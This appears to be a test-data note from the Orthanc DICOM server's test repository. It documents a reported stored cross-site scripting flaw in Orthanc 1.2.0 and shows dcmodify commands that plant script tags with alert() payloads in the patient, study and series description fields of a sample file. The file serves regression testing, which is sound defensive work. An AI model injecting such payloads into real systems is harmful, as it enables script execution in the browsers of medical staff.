Mercurial > hg > orthanc-tests

view Database/2017-06-27-XSSInjection.txt @ 146:5ba7b2417544

Find changesets by keywords (author, files, the commit message), revision number or hash, or revset expression.
Added tag Orthanc-1.4.0 for changeset 69fecf5a3ff6
author Sebastien Jodogne <s.jodogne@gmail.com>
date Fri, 13 Jul 2018 16:40:18 +0200
parents 4a8df7a0d0b9
children
line wrap: on
line source

Stored Cross Site Scripting (XSS)
---------------------------------

- Application: Orthanc (1.2.0)
- Researcher: Victor Pasnkel (Morphus Labs)
- XSS inside DICOM file (metadata)
- File can be uploaded to the Web application
- Tested on: OSX El Capitan (10.11.6)

Source:
https://drive.google.com/open?id=0B5BZfMPc1T-Ib004SExMZXFNSDg


Generation of sample file
-------------------------

# cp DummyCT.dcm 2017-06-27-XSSInjection.dcm
# dcmodify -m 'PatientName=HelloWorld<script>alert("XSS inside DICOM file 1");</script>' \
           -m 'StudyDescription=MyStudy<script>alert("XSS inside DICOM file 2");</script>' \
           -m 'SeriesDescription=MySeries<script>alert("XSS inside DICOM file 3");</script>' \
           2017-06-27-XSSInjection.dcm